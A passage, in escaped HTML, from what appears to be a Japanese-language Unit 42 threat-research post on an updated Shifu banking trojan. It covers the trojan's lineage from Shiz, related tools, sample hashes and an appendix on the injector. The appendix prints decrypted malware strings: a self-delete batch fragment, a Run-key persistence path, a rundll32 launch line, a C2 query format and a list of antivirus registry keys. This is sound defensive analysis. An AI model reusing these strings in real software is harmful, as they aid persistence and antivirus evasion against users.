400;\">\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u5185\u306b\u898b\u3089\u308c\u308b\u201cIntelPowerAgent6\u201d\u3068\u3044\u3046\u6587\u5b57\u5217\u3067\u306f\u306a\u304f\u3001\u4e00\u5ea6\u3082\u4f7f\u308f\u308c\u308b\u3053\u3068\u306e\u306a\u3044\u201cIntelPowerAgent32\u201d\u3068\u3044\u3046\u6587\u5b57\u5217\u304c\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u4e2d\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u30b7\u30b9\u30c6\u30e0\u304c\u65e2\u306b\u611f\u67d3\u3057\u3066\u3044\u308b\u304b\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u304c\u4f5c\u6210\u3059\u308b\u30a2\u30c8\u30e0\u306b\u52a0\u3048\u3001\u30e1\u30a4\u30f3 
\u30da\u30a4\u30ed\u30fc\u30c9\u3082\u540d\u524d\u4ed8\u304d\u306e\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f5c\u6210\u3057\u307e\u3059\u304c\u3001\u3053\u306e\u540d\u524d\u306f\u30a2\u30c8\u30e0\u7528\u306e\u540d\u524d\u3092\u751f\u6210\u3059\u308b\u305f\u3081\u306e\u540c\u3058\u624b\u9806\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059(\u4ed8\u9332\u3092\u53c2\u7167\u306e\u3053\u3068)\u3002\u3057\u304b\u3057\u3001\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u306f\u201cDAN6J0-\u201d\u3068\u3044\u3046\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305f\u63a5\u982d\u8f9e\u3092\u3001\u30a2\u30c8\u30e0\u6587\u5b57\u5217\u7528\u306b\u3082\u4f7f\u7528\u3055\u308c\u308b\u30d0\u30a4\u30c8 \u30b7\u30fc\u30b1\u30f3\u30b9\u306e\u524d\u306b\u4f7f\u3044\u3001\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002\u201c{DAN6J0-ae000000d2000000e100}\u201d<\/p>\n<figure id=\"attachment_23102\" aria-describedby=\"caption-attachment-23102\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23102 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2.png\" alt=\"\u56f32 Shifu\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u304a\u3088\u3073\u95a2\u9023\u3065\u3051\u3089\u308c\u305fsvchost\u30d7\u30ed\u30bb\u30b9\" width=\"945\" height=\"593\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-900x565.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-300x188.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-768x482.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_2-370x232.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" 
\/><\/a><figcaption id=\"caption-attachment-23102\" class=\"wp-caption-text\">\u56f32 Shifu\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u304a\u3088\u3073\u95a2\u9023\u3065\u3051\u3089\u308c\u305fsvchost\u30d7\u30ed\u30bb\u30b9<\/figcaption><\/figure>\n<h3>Shifu\u3001Shiz\u304a\u3088\u3073\u305d\u306e\u4ed6\u306e\u95a2\u9023\u30c4\u30fc\u30eb<\/h3>\n<p style=\"font-weight: 400;\">Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u4e3b\u306b\u3001\u4eca\u65e5\u3067\u3082\u3044\u307e\u3060\u306b\u51fa\u56de\u3063\u3066\u3044\u308b\u6700\u53e4\u306e\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e1\u3064\u3067\u3042\u308bShiz\/iBank\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002Shiz\u306f2006\u5e74\u306b\u521d\u3081\u3066\u767a\u898b\u3055\u308c\u3001\u305d\u306e\u3068\u304d\u4ee5\u6765\u3001\u3044\u304f\u3064\u304b\u306e\u958b\u767a\u30b9\u30c6\u30fc\u30b8\u3092\u7d4c\u3066\u304d\u307e\u3057\u305f\u3002\u305d\u308c\u306f\u3001\u30ed\u30b7\u30a2\u306e\u91d1\u878d\u6a5f\u95a2\u306e\u307f\u3092\u6a19\u7684\u3068\u3057\u305f\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3068\u3057\u3066\u59cb\u307e\u308a\u307e\u3057\u305f\u3002\u305d\u306e\u5f8c\u3001\u30a4\u30bf\u30ea\u30a2\u306e\u9280\u884c\u3082\u6a19\u7684\u306b\u3055\u308c\u59cb\u3081\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u3055\u3089\u306a\u308b\u56fd\u969b\u5316\u3092\u8996\u91ce\u306b\u5165\u308c\u305f\u6e96\u5099\u6bb5\u968e\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u904e\u53bb5\u5e74\u9593\u3067\u8ffd\u8de1\u3057\u3066\u304d\u305f\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u3001\u7b2c2\u4e16\u4ee3\u304b\u3089\u7b2c4\u4e16\u4ee3(2011\u5e74)\u304a\u3088\u3073\u7b2c5\u4e16\u4ee3(2013\/2014\u5e74)\u307e\u3067\u306e\u7bc4\u56f2\u306b\u53ca\u3073\u307e\u3059\u3002Shiz\u306e\u7b2c5\u4e16\u4ee3\u304c\u30012014\u5e74\u306b\u5b9f\u4e16\u754c\u3067\u6
91c\u51fa\u3055\u308c\u305f\u6700\u5f8c\u306e\u4e16\u4ee3(\u6700\u7d42\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f3\u306f5.6.25)\u3067\u3001\u305d\u308c\u306f\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0 \u30b9\u30bf\u30a4\u30eb\u304c\u7b2c4\u4e16\u4ee3\u3068\u306f\u7570\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u304c\u8ca9\u58f2\u307e\u305f\u306f\u5171\u6709\u3055\u308c\u305f\u3053\u3068\u304c\u7279\u5b9a\u3067\u304d\u305f\u305f\u3081\u3001\u5225\u306e\u30d7\u30ed\u30b0\u30e9\u30de\u306b\u3088\u3063\u3066\u958b\u767a\u3055\u308c\u305f\u3088\u3046\u3067\u3059\u3002\u7b2c5\u4e16\u4ee3\u306e\u4e00\u756a\u6700\u521d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306eC&amp;C\u30b5\u30fc\u30d0\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u305f\u30af\u30a8\u30ea\u6587\u5b57\u5217\u304c\u3001\u79c1\u305f\u3061\u306e\u898b\u89e3\u3092\u88cf\u4ed8\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=%s&amp;ver=5.0.1&amp;up=%u&amp;os=%03u&amp;ltime=%s%d&amp;token=%d&amp;cn=reborn&amp;av=%s<\/p>\n<p style=\"font-weight: 400;\">\u653b\u6483\u6d3b\u52d5\u540d\u306b\u6587\u5b57\u5217\u201creborn\u201d\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306f\u30012015\u5e74\u4e2d\u76e4\u306b\u3001\u51fa\u56de\u3063\u3066\u3044\u308b\u3053\u3068\u304c\u521d\u3081\u3066\u691c\u51fa\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u3055\u3089\u306a\u308b\u56fd\u969b\u5316\u3092\u8996\u91ce\u306b\u5165\u308c\u305f\u3001Shiz\u306e\u7b2c5\u4e16\u4ee3\u306e\u9032\u5316\u578b\u3060\u3068\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 
400;\">\u79c1\u305f\u3061\u306f\u3001\u904e\u53bb2\u5e74\u9593\u306b\u308f\u305f\u308aShiz\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u8ffd\u8de1\u3057\u3066\u304d\u305f\u3060\u3051\u3067\u306a\u304f\u3001\u540c\u3058\u4f5c\u6210\u8005\u304b\u3089\u914d\u5e03\u3055\u308c\u305f\u3068\u898b\u3089\u308c\u308b\u3044\u304f\u3064\u304b\u306e\u8ffd\u52a0\u306e\u30de\u30eb\u30a6\u30a7\u30a2 \u30c4\u30fc\u30eb\u3092\u691c\u51fa\u3057\u307e\u3057\u305f\u3002\u53ce\u96c6\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u4f5c\u6210\u8005\u304c\u4e00\u9023\u306e\u91d1\u878d\u95a2\u9023\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u5168\u4f53\u3092\u958b\u767a\u3057\u305f\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u4f5c\u6210\u8005\u304c\u30b0\u30eb\u30fc\u30d7\u306e\u4e00\u54e1\u3068\u3057\u3066\u4f5c\u696d\u3057\u3066\u3044\u308b\u306e\u304b\u3001\u307e\u305f\u306f\u30de\u30eb\u30a6\u30a7\u30a2\u305d\u306e\u3082\u306e\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u304b\u306f\u308f\u304b\u308a\u307e\u305b\u3093\u3002\u3053\u308c\u3089\u306e\u30c4\u30fc\u30eb\u306f\u4e3b\u306b\u3001Shiz\u306e\u7b2c5\u4e16\u4ee3\u306e\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u3053\u308c\u3089\u306e\u30c4\u30fc\u30eb\u306f\u3059\u3079\u3066\u3001\u540c\u3058\u30eb\u30fc\u30c8 \u30d5\u30a9\u30eb\u30c0\u3092\u6301\u3064PDB\u30d1\u30b9\u3092\u542b\u3093\u3067\u3044\u308b\u305f\u3081\u3001\u305d\u308c\u3089\u3092\u4e00\u7dd2\u306b\u3057\u3066\u95a2\u9023\u4ed8\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\\u2026<\/p>\n<p style=\"font-weight: 400;\">\u3055\u3089\u306b\u3001\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0 
\u30b9\u30bf\u30a4\u30eb\u3068\u4f7f\u7528\u3055\u308c\u3066\u3044\u308bAPI\u95a2\u6570\u304c\u975e\u5e38\u306b\u4f3c\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u534a\u306e\u30c4\u30fc\u30eb\u304cShiz\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001BinDiff\u3067\u30c4\u30fc\u30eb\u9593\u306e\u30b3\u30fc\u30c9\u3092\u6bd4\u8f03\u3059\u308b\u3068\u3001\u304b\u306a\u308a\u985e\u4f3c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002\u305d\u306e\u4e0a\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u6a5f\u80fd\u3092\u4f34\u3046\u305d\u308c\u3089\u306e\u30c4\u30fc\u30eb\u306b\u306f\u3001C&amp;C\u30b5\u30fc\u30d0\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u305f\u3081\u306b\u3001Shiz\u3067\u898b\u3089\u308c\u305f\u3082\u306e\u3068\u3088\u304f\u4f3c\u305f\u30af\u30a8\u30ea\u6587\u5b57\u5217\u304c\u7d44\u307f\u8fbc\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u540c\u696d\u8005\u306e<a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2015\/10\/shifu-malware-analyzed-behavior-capabilities-and.html\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">FireEye\u304c\u6628\u5e74\u8aac\u660e\u3057\u305f<\/a>\u3068\u304a\u308a\u3001Shifu\u3067\u898b\u3064\u304b\u3063\u305fPDB\u30d1\u30b9\u306f\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\project\\main\\payload\\payload.x86.pdb<\/p>\n<p style=\"font-weight: 400;\">\u79c1\u305f\u3061\u304c\u7279\u5b9a\u3057\u305f\u305d\u306e\u4ed6\u306e\u30c4\u30fc\u30eb\u306b\u306f\u4ee5\u4e0b\u306ePDB\u30d1\u30b9\u304c\u542b\u307e\u308c\u3001\u540c\u3058\u4f5c\u6210\u8005\u304b\u3089\u306e\u3082\u306e\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\cryptor\\Release\\crypted.pdb<\/p>\n<p style=\"font-weight: 400; padding-left: 
40px;\">Z:\\coding\\malware\\tests\\Release\\cryptoshit.pdb<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\malware\\RDP\\output\\Release\\rdp_bot.pdb<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">Z:\\coding\\malware\\ScanBot\\Release\\bot.pdb<\/p>\n<p style=\"font-weight: 400;\">\u5185\u90e8\u7684\u306b\u201ccryptor\u201d\u3068\u540d\u4ed8\u3051\u3089\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u306f\u3001BIFIT\u306e\u8ca1\u52d9\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u653b\u6483\u3059\u308b\u3053\u3068\u3067\u77e5\u3089\u308c\u3066\u3044\u308b\u6700\u521d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3001<a href=\"https:\/\/securelist.com\/blog\/virus-watch\/59901\/lock-stock-and-two-smoking-trojans-2\/2\/\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">BifitAgent<\/a>\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u540c\u3058\u4eba\u7269\u304cBifitAgent\u3092\u958b\u767a\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u305d\u308c\u3092\u793a\u3059\u75d5\u8de1\u306f\u898b\u3064\u304b\u3063\u3066\u3044\u307e\u305b\u3093\u3002\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308b\u3068\u3001\u5927\u534a\u306e\u30b5\u30f3\u30d7\u30eb\u306f2013\u5e74\u306e10\u6708\/11\u6708\u306b\u4f5c\u6210\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n<p style=\"font-weight: 400;\">\u201crdp_bot\u201d\u3068\u3044\u3046\u540d\u524d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001RDP\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u4f7f\u7528\u3057\u3066\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u3078\u306e\u30d5\u30eb 
\u30a2\u30af\u30bb\u30b9\u6a29\u3092\u53d6\u5f97\u3059\u308b\u5c0f\u3055\u306a\u30dc\u30c3\u30c8\u3067\u3059\u3002\u3053\u306e\u8a18\u4e8b\u3067\u8aac\u660e\u3057\u305fShifu\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u540c\u3058\u6539\u5909\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30c4\u30fc\u30eb\u306f\u3001\u304a\u305d\u3089\u304fShiz\u30d0\u30f3\u30ad\u30f3\u30b0\u7cfb\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3068\u4e00\u7dd2\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u305d\u308c\u306b\u3088\u3063\u3066\u3001\u653b\u6483\u8005\u306f\u88ab\u5bb3\u8005\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u304b\u3089\u76f4\u63a5\u3001\u81ea\u8eab\u306e\u4e0d\u6b63\u884c\u70ba\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u308b\u304b\u3089\u3067\u3059\u3002\u305d\u3046\u3059\u308b\u3053\u3068\u3067\u3001IP\u30a2\u30c9\u30ec\u30b9\u3001\u30d6\u30e9\u30a6\u30b6\u306e\u30d5\u30c3\u30c8\u30d7\u30ea\u30f3\u30c8\u3001\u307e\u305f\u306f\u30ad\u30fc\u30dc\u30fc\u30c9 \u30ec\u30a4\u30a2\u30a6\u30c8\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u9280\u884c\u306e\u8a50\u6b3a\u5bfe\u7b56\u30b7\u30b9\u30c6\u30e0\u3092\u6b3a\u304f\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u30c4\u30fc\u30eb\u306f\u3001Alisa Esage\u306b\u3088\u3063\u3066\u5b9f\u65bd\u3055\u308c\u305f<a href=\"https:\/\/de.slideshare.net\/alisaesage\/hacking-microsoft-remote-desktop-services-for-fun-and-profit\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">RDP\u306b\u95a2\u3059\u308b\u8abf\u67fb<\/a>\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u306e\u65e5\u4ed8\u306f\u30012013\u5e746\u6708\u304b\u308911\u6708\u307e\u3067\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 
400;\">\u201ccryptoshit\u201d\u3068\u3044\u3046\u540d\u524d\u306e\u30c4\u30fc\u30eb\u306b\u306f\u3001rdp_bot\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u304c\u542b\u307e\u308c\u3001\u307e\u305f\u3082\u3084\u3001\u3053\u3053\u3067\u8aac\u660e\u3057\u305fShifu\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u540c\u3058\u6539\u5909\u3055\u308c\u305fRC4\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308b\u3068\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u65e5\u4ed8\u306f2013\u5e749\u6708\/10\u6708\u304a\u3088\u30732014\u5e741\u6708\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u5185\u90e8\u540d\u304c\u201cScanBot\u201d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30aa\u30da\u30ec\u30fc\u30bf\u304b\u3089\u306e\u30b3\u30de\u30f3\u30c9\u3092\u4ecb\u3057\u3066\u88ab\u5bb3\u8005\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u5185\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30b9\u30ad\u30e3\u30f3\u3059\u308b\u305f\u3081\u306bSuper Light Regular Expression\u30e9\u30a4\u30d6\u30e9\u30ea(SRLE)\u3092\u4f7f\u7528\u3059\u308b\u5c0f\u3055\u306a\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002\u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308b\u3068\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u65e5\u4ed8\u306f2013\u5e746\u6708\u3067\u3059\u3002<\/p>\n<h3>Shifu\u5bfe\u7b56\u306e\u4fdd\u8b77<\/h3>\n<p style=\"font-weight: 400;\">Palo Alto Networks\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067Shifu\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">Wildfire\u304cShifu\u30d5\u30a1\u30a4\u30eb\u3092\u60aa\u610f\u306e\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u5206\u985e\u3057\u3001\u7f72\u540d\u306f\u8105\u5a01\u9632\u5fa1\u306b\u8aad\u307f\u8fbc\u307e\u308c\u307e\u3059\u3002<\/li>\n<li style=\"font-weight: 400;\">AutoFocus\u306e\u304a\u5ba2\u69d8\u306f\u3001<a 
href=\"https:\/\/autofocus.paloaltonetworks.com\/\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">Shifu<\/a>\u30bf\u30b0\u3092\u4f7f\u7528\u3057\u3066\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u8ffd\u8de1\u3067\u304d\u307e\u3059\u3002<\/li>\n<li style=\"font-weight: 400;\">Shifu\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb \u30c9\u30e1\u30a4\u30f3\u306f\u3001\u8105\u5a01\u9632\u5fa1\u3092\u901a\u3058\u3066\u30d6\u30ed\u30c3\u30af\u3055\u308c\u307e\u3059\u3002<\/li>\n<\/ul>\n<h3>\u8aac\u660e\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u306eSHA256\u30cf\u30c3\u30b7\u30e5<\/h3>\n<h4>\u521d\u671f\u306e\u96e3\u8aad\u5316\u3055\u308c\u305f\u30ed\u30fc\u30c0\u30fc<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">d3f9c4037f8b4d24f2baff1e0940d2bf238032f9343d06478b5034d0981b2cd9<br \/>\n368b23e6d9ec7843e537e9d6547777088cf36581076599d04846287a9162652b<br \/>\ne7e154c65417f5594a8b4602db601ac39156b5758889f708dac7258e415d4a18<br \/>\nf63ec1e5752eb8b9a07104f42392eebf143617708bfdd0fe31cbf00ef12383f9<\/p>\n<h4>\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">003965bd25acb7e8c6e16de4f387ff9518db7bcca845502d23b6505d8d3cec01<br \/>\n1188c5c9f04658bef20162f3001d9b89f69c93bf5343a1f849974daf6284a650<\/p>\n<h4>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">e7c1523d93154462ed9e15e84d3af01abe827aa6dd0082bc90fc8b58989e9a9a<\/p>\n<h4>CVE-2016-0167\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8(x86)<\/h4>\n<p style=\"padding-left: 40px;\">5124f4fec24acb2c83f26d1e70d7c525daac6c9fb6e2262ed1c1c52c88636bad<\/p>\n<h4>CVE-2016-0167\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8(x64)<\/h4>\n<p style=\"font-weight: 400; padding-left: 
40px;\">f3c2d4090f6f563928e9a9ec86bf0f1c6ee49cdc110b7368db8905781a9a966e<\/p>\n<h4>\u30e1\u30a4\u30f3\u306e\u30da\u30a4\u30ed\u30fc\u30c9<\/h4>\n<p style=\"font-weight: 400; padding-left: 40px;\">e9bd4375f9b0b95f385191895edf81c8eadfb3964204bbbe48f7700fc746e4dc<br \/>\n5ca2a9de65c998b0d0a0a01b4aa103a9410d76ab86c75d7b968984be53e279b6<\/p>\n<h3>\u4ed8\u9332 - \u6280\u8853\u8a73\u7d30<\/h3>\n<h4>\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e\u5206\u6790<\/h4>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc(x86 DLL)\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u306f\u305d\u306e\u5f8c\u3001CVE-2016-0167\u306e2\u3064\u306e\u57cb\u3081\u8fbc\u307f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8(x86\/64 DLL)\u306b\u306a\u308a\u307e\u3059\u3002\u307e\u305f\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001\u305d\u306e.tls\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u3001\u6697\u53f7\u5316\u3055\u308c\u3001aPLib\u3067\u5727\u7e2e\u3055\u308c\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9 \u30e2\u30b8\u30e5\u30fc\u30eb(x86 
DLL)\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3059\u308b\u306b\u306f\u3001.rsrc\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u308bsalt\u5024\u3068\u6539\u5909\u3055\u308c\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u306eRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e.data\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u3042\u308b\u6709\u610f\u7fa9\u306a\u6587\u5b57\u5217\u306f\u3001\u93750x8D\u3067XOR\u3055\u308c\u3001\u5373\u5ea7\u306b\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217:<\/p>\n<pre class=\"lang:default decode:true\">AddMandatoryAce\r\nADVAPI\r\nAdvapi32.dlladvapi32.dllws2_32.dll\r\nWPUCloseEvent\r\nWPUCloseSocketHandleWPUCreateEvent\r\nWPUCreateSocketHandle\r\nWPUFDIsSet\r\nWPUGetProviderPath\r\nWPUModifyIFSHandle\r\nWPUPostMessage\r\nWPUQueryBlockingCallbackWPUQuerySocketHandleContext\r\nWPUQueueApc\r\nWPUResetEvent\r\nWPUSetEvent\r\nWPUOpenCurrentThreadWPUCloseThread\r\nWSPStartup\r\n &gt; %1\\r\\ndel %0\r\nsoftware\\\\microsoft\\\\windows\\\\currentversion\\\\run\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/echo \r\nrundll32.exe shell32.dll, ShellExec_RunDLL %s\r\nMicrosoft\\\\Microsoft AntimalwareSoftware\\\\Coranti\r\nSoftware\\\\risingSoftware\\\\TrendMicroSoftware\\\\Symantec\r\nSoftware\\\\ComodoGroup\r\nSoftware\\\\Network Associates\\\\TVD\r\nSoftware\\\\Data Fellows\\\\F-SecureSoftware\\\\Eset\\\\Nod\r\nSoftware\\\\Softed\\\\ViGUARD\r\nSoftware\\\\Zone Labs\\\\ZoneAlarm\r\nSoftware\\\\Avg\r\nSoftware\\\\VBA32\r\nSoftware\\\\Doctor WebSoftware\\\\G DataSoftware\\\\Avira\r\nSoftware\\\\AVAST Software\\\\Avast\r\nSoftware\\\\KasperskyLab\\\\protected\r\nSoftware\\\\Bitdefender\r\nSoftware\\\\Panda 
